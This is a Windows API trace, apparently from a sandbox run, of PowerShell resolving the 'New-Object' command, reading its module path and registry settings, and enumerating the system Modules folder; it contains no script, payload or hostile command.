	[0046.564] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.WSF", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.564] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.WSH", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.564] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.MSC", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.565] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.CPL", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.565] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.567] CoTaskMemAlloc (cb=0x214) returned 0x1505fbbf500
	[0046.567] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbbf500, nSize=0x108 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0046.567] CoTaskMemFree (pv=0x1505fbbf500) 
	[0046.567] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18dea8 | out: phkResult=0x184c18dea8*=0x680) returned 0x0
	[0046.568] RegQueryValueExW (in: hKey=0x680, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18def8, lpData=0x0, lpcbData=0x184c18def0*=0x0 | out: lpType=0x184c18def8*=0x1, lpData=0x0, lpcbData=0x184c18def0*=0x56) returned 0x0
	[0046.568] RegQueryValueExW (in: hKey=0x680, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18def8, lpData=0x15047a7aed8, lpcbData=0x184c18def0*=0x56 | out: lpType=0x184c18def8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18def0*=0x56) returned 0x0
	[0046.568] RegCloseKey (hKey=0x680) returned 0x0
	[0046.574] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18da80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0046.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dec0) returned 1
	[0046.574] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfa0 | out: lpFileInformation=0x184c18dfa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0046.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18de80) returned 1
	[0046.576] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules")) returned 0xffffffff
	[0046.602] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18da80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0046.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dec0) returned 1
	[0046.602] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfa0 | out: lpFileInformation=0x184c18dfa0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18de80) returned 1
	[0046.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0046.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dec0) returned 1
	[0046.603] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfa0 | out: lpFileInformation=0x184c18dfa0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1
	[0046.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18de80) returned 1
	[0046.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de40) returned 1
	[0046.636] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d930, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0046.636] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", nBufferLength=0x105, lpBuffer=0x184c18d8d0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", lpFilePart=0x0) returned 0x33
	[0046.636] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*", lpFindFileData=0x184c18dae0 | out: lpFindFileData=0x184c18dae0) returned 0x1505fab8640
	[0046.636] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.637] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.637] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.637] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.637] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.637] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.637] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.637] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.638] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.638] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.638] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.638] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.638] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.638] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.638] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.638] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.642] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.642] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.642] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.642] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.642] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.642] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.642] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.642] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.642] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.642] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.642] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.643] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.643] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.643] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.643] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.643] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.643] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.643] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.643] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.643] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.643] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.644] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.644] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.644] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.644] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.644] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.644] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.644] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.644] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.644] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.644] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.645] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.646] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.646] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.646] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.646] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.646] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 0
	[0046.646] FindClose (in: hFindFile=0x1505fab8640 | out: hFindFile=0x1505fab8640) returned 1
	[0046.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd90) returned 1
	[0046.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0046.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de40) returned 1
	[0046.646] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18d930, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0046.646] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", nBufferLength=0x105, lpBuffer=0x184c18d8d0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", lpFilePart=0x0) returned 0x33
	[0046.646] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*", lpFindFileData=0x184c18dae0 | out: lpFindFileData=0x184c18dae0) returned 0x1505fab8340
	[0046.647] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.647] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.647] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.647] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.647] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.647] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.647] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.647] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.648] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.648] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.648] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.648] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.648] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.648] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.648] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.648] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.648] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.649] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.649] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.649] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.649] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.649] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.649] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.649] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.649] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.649] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.650] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.650] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.650] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.650] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.650] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.650] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.650] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.650] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.650] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.650] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.651] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.651] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.651] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.651] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.651] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.651] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.651] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.651] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.651] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.652] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.652] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.652] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.652] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.652] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.652] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.652] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.652] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.652] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.653] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.653] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.653] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.653] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.653] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.653] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.653] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.653] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.653] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.654] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0046.654] FindNextFileW (in: hFindFile=0x1505fab8340, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 0
	[0046.654] FindClose (in: hFindFile=0x1505fab8340 | out: hFindFile=0x1505fab8340) returned 1
	[0046.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd90) returned 1
	[0046.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0046.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.654] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44
	[0046.654] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45
	[0046.654] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7bc0
	[0046.656] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.656] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.656] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.657] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.657] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.657] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.657] FindClose (in: hFindFile=0x1505fab7bc0 | out: hFindFile=0x1505fab7bc0) returned 1
	[0046.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
